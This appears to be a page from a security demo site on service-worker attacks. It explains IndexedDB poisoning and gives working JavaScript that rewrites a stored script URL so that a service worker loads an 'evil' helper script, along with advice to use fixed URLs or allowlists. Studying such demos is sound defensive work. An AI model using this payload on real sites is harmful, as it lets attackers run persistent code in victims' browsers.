IndexedDB Poisoning
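To test this attack, follow the steps below:
- Poison the IndexedDB database by executing malicious code via XSS (simply invoke the malicious JS function)
- Visit a target page that installs a service worker (SW), which in turn installs a script from the poisoned URL
This works because IndexedDB is shared by every script running on the origin: a service worker that loads code from a URL stored there is trusting data that any injected script can rewrite. Such a URL should be fixed in the service worker source, or checked against an allowlist before it is used.
Below is the code that poisons the URL stored in the database: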
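/**
 * Demo payload for the IndexedDB-poisoning test case: replaces the
 * `report_url` record in the `urls` object store of `demo_db` with the URL
 * of the demo's helper script, then tells the tester to reload.
 *
 * IndexedDB is readable and writable by every script on the origin, so the
 * record written here is exactly what a same-origin service worker will read
 * back. Code that consumes this record should treat it as untrusted input
 * (fixed URL or allowlist check) rather than passing it to a script loader.
 *
 * Takes no arguments and returns nothing; all work happens in IndexedDB
 * event callbacks. Failures are logged to the console.
 */
function modify_indexDB() {
  const request = indexedDB.open('demo_db', 1);

  request.onerror = () => {
    console.error('Could not open demo_db', request.error);
  };

  request.onsuccess = (event) => {
    const db = event.target.result;
    const txn = db.transaction('urls', 'readwrite');

    // IDBTransaction fires "complete", not "success"; an `onsuccess` handler
    // on a transaction is never called. Using `oncomplete` also means the
    // message is shown only after the write has been committed.
    txn.oncomplete = () => {
      alert('URL Modified!!. Reload Page');
    };
    txn.onerror = () => {
      console.error('Transaction on "urls" failed', txn.error);
    };

    const store = txn.objectStore('urls');
    // Delete the current record in the DB, then insert the replacement URL.
    store.delete('report_url').onsuccess = () => {
      store.put({
        id: 'report_url',
        url: 'https://demopwa.github.io/SW_Attacks/helper_scripts/fetch_evil_sw.js',
      });
    };
  };
}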
Click this link to visit the target page!!
Go to Target Page